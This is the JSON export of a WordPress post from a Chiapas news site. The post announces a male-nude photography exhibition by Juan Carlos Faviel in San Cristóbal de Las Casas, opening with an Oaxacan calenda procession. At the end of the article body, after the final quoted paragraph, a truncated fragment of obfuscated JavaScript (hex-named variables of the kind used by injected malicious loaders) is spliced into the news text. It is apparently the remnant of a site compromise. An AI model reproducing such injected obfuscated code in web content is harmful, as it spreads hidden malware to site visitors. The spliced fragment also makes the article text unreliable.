{"id":11392,"date":"2023-08-17T23:17:26","date_gmt":"2023-08-17T23:17:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11392"},"modified":"2023-08-17T23:17:26","modified_gmt":"2023-08-17T23:17:26","slug":"habra-calenda-oaxaquena-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11392","title":{"rendered":"Habr\u00e1 calenda oaxaque\u00f1a en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-17-at-12.13.55-PM-576x1024.jpeg\" alt=\"\" class=\"wp-image-11393\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-17-at-12.13.55-PM-576x1024.jpeg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-17-at-12.13.55-PM-169x300.jpeg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-17-at-12.13.55-PM.jpeg 750w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La exposici\u00f3n fotogr\u00e1fica de desnudo masculino de Juan Carlos Faviel iniciar\u00e1 este s\u00e1bado a las 6 de la tarde con una calenda oaxaque\u00f1a, que partir\u00e1 del Arco del Carmen hacia la Galer\u00eda de Kiki Su\u00e1rez, d\u00f3nde habr\u00e1 una conferencia de prensa y a las 7 de la noche se cortar\u00e1 el list\u00f3n de inauguraci\u00f3n.<\/p>\n\n\n\n<p>En entrevista, Juan Carlos Faviel dijo que se encuentra regresando de Oaxaca donde tuvo una exposici\u00f3n &#8220;se llama Paradiso y es una tem\u00e1tica de desnudo masculino con una perspectiva barroca y cl\u00e1sica que es lo importante de rescatar en esta exposici\u00f3n toda fotograf\u00eda es digital, es una retrospectiva que parte hace 16 a\u00f1os y que ahora est\u00e1 viendo la luz por primera vez&#8221;.<\/p>\n\n\n\n<p>&#8220;Es un honor exponer en La Galer\u00eda de Kiki, es un punto importante, referente en el Sureste del pa\u00eds, eso me pone contento&#8221;, agreg\u00f3. Cuestionado sobre su trayectoria dijo que inici\u00f3 de una manera muy natural en la Universidad de Ciencias y Artes de Chiapas, ah\u00ed vemos temas de desnudo masculino y femenino, todo artista es importante que vaya encontrando sus herramientas de expresi\u00f3n y la m\u00eda la encontr\u00e9 en la fotograf\u00eda&#8221;.<\/p>\n\n\n\n<p>Asimismo, coment\u00f3 que son 16 im\u00e1genes, en su mayor\u00eda, un 90 por ciento, del 2023 &#8220;son m\u00e1s actuales, realizadas en mi estudio. Tengo cuatro exposiciones individuales en Tuxtla y Chiapa de Corzo&#8221;.<\/p>\n\n\n\n<p>Finalmente, invit\u00f3 a asistir a la calenda oaxaque\u00f1a &#8220;tengo familia en Tehuantepec, en todo el istmo y valle central entonces partimos a las 6 de la tarde del Arco del Carmen a la Galer\u00eda de Kiki, a las seis y media habr\u00e1 una conferencia de prensa para comentar la exposici\u00f3n, a las 7 de la noche ser\u00e1 el corte de list\u00f3n para las personas que quieran asistir y considero que la caminata va llamar mucho la atenci\u00f3n porque van haber tehuanas y uno que otro mezcal&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- La exposici\u00f3n fotogr\u00e1fica de desnudo masculino de Juan Carlos Faviel iniciar\u00e1 este s\u00e1bado a las 6 de la tarde con una calenda oaxaque\u00f1a, que partir\u00e1 del Arco del Carmen hacia la Galer\u00eda de Kiki Su\u00e1rez, d\u00f3nde habr\u00e1 una conferencia de prensa y a las 7 de la noche &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11392","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11392"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11392\/revisions"}],"predecessor-version":[{"id":11394,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11392\/revisions\/11394"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11393"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}